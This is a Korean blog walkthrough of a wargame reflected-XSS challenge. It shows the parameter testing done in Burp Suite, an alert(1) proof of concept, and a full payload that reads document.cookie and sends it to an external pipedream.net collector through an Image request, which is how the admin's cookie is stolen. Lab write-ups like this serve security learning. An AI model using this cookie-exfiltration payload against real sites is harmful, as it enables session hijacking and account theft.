<Segfault> 워게임 문제풀이 [XSS 2]

2024. 6. 30. 22:47·워게임 문제풀이/Segfault

목표: 관리자의 쿠키를 탈취하라!


 

 

우선 글쓰기 게시판 입니다.

글을 쓰기전 일단 입력이 되는 부분을 체크하고 가겠습니다.

Search 창에 "Fubao" 라고 적어준뒤 알림창이 뜨는 양상을 보겠습니다.


 

저희가 적어준 값이 페이지에 표시되는것을 볼수 있습니다.

그러면 저희는 이렇게 생각해 볼수 있겠죠.

1. "이 부분을 Refelcted XSS 공격에 사용할 수 있을까?"

2. "그러면 우선 Get 방식으로 파라미터가 전달되는지 확인해봐야겠다"

 

그리하여 Burp suite 로 방금보낸 요청을 살펴보도록 하죠.

 


요청

 

보시면 Fubao 라는 값을 POST 방식으로 보내주고 , 그 값이 응답에 alert 를 사용해서 띄워지고 있습니다.

여기서 제가 확인하고 싶은것은

 

'변수들을 GET 방식으로 바꿔 보내도 같은 응답이 오느냐.' 입니다.

만약 가능하다면 입력값에 ') alert(1); // 을 삽입하여 POC 코드를 실행해볼수 있겠죠.

그리고 된다면 이는 Reflected XSS 로 이어질수 있습니다.

 


GET 방식으로 바꿔서 보낸 후 응답

 

GET 방식으로 변수값을 보내도 동일한 응답을 받는것을 확인하였습니다.

이제 POC 코드를 체크해보겠습니다.

Board_Search 입력값 : ') alert(1); //

 

스크립트 코드 안에서 POC 코드인 alert(1); 이 유효하게 동작하는것을 확인하였습니다.

이제 alert(1) 대신 cookie 탈취 코드를 입력해주겠습니다.

 


입력값 >> ');var%20data=document.cookie;var%20i=new%20Image();i.src='https://encxlimxsq6z.x.pipedream.net?cookie='%2Bdata;

쿠키 탈취 악성스크립트 작성
쿠키 탈취 성공

 

 

제가 설정해둔 사이트로 Image 파일 요청을 보내면서 동시에 쿠키값을 전달하는것을 확인하실수 있습니다.

이제 이 GET 방식의 링크를 관리자의 컴퓨터로 접속하게 해보도록 하겠습니다. 


어드민이 성공적으로 공격자 서버의 방문
결과

 

무사히 플래그 값을 얻을수 있었다.

 


 

긴 글 읽어주셔서 감사합니다!

'워게임 문제풀이 > Segfault' 카테고리의 다른 글

<Segfault> 워게임 문제풀이 [XSS 4]  (0) 2024.07.01
<Segfault> 워게임 문제풀이 [XSS 3]  (0) 2024.07.01
<Segfault> 워게임 문제풀이 [XSS 1]  (0) 2024.06.26
<Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection  (1) 2024.05.31
<Segfault> 워게임 문제풀이[6편] - SQL Injection3  (1) 2024.05.31
'워게임 문제풀이/Segfault' 카테고리의 다른 글
  • <Segfault> 워게임 문제풀이 [XSS 4]
  • <Segfault> 워게임 문제풀이 [XSS 3]
  • <Segfault> 워게임 문제풀이 [XSS 1]
  • <Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection
무너박사
무너박사
IT 보안 블로그 입니다. 제가 작성하는 블로그가 누군가의 공부에 조금이라도 도움이 되길 바라며 작성하였습니다.
  • 무너박사
    무너박사의 연구일지
    무너박사
  • 전체
    오늘
    어제
    • 분류 전체보기 (104)
      • WEB 지식 (3)
      • 웹해킹 (13)
      • 웹개발(PHP-Mysql) (12)
      • 웹개발(JSP-Oracle) (2)
      • 워게임 문제풀이 (19)
        • Segfault (17)
        • Dreamhack (2)
      • SQL (3)
      • Python (2)
      • AI (1)
        • LLM(Large Language Model) (1)
      • Kail Linux (3)
      • 잡다한 지식 (2)
      • 모바일 앱개발(Kotlin-PHP-Mysql) (13)
      • 모바일 앱해킹(Android) (31)
        • Frida Lab (2)
        • Android DIVA (8)
        • Insecure Bank (20)
      • 안드로이드 위협 탐지 및 우회 (0)
        • 루팅 탐지 & 우회 (0)
        • 디버깅 탐지 & 우회 (0)
        • 에뮬레이터 탐지 & 우회 (0)
        • Frida 탐지 & 우회 (0)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      Blind sql injection
      Koltin
      Android Studio
      sql injection
      insecure bank
      앱해킹
      android diva
      취업반
      취업반 6기
      XSS
      칼리리눅스
      인시큐어 뱅크
      모바일 앱개발
      mobile diva
      시스템해킹
      Kotlin
      해킹
      모의해킹
      php
      안드로이드 스튜디오
      MySQL
      인시큐어뱅크
      웹해킹
      모바일앱개발
      dom based xss
      취업반6기
      normaltic
      리패키징
      워게임
      모바일 앱해킹
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    무너박사
    <Segfault> 워게임 문제풀이 [XSS 2]
    상단으로

    티스토리툴바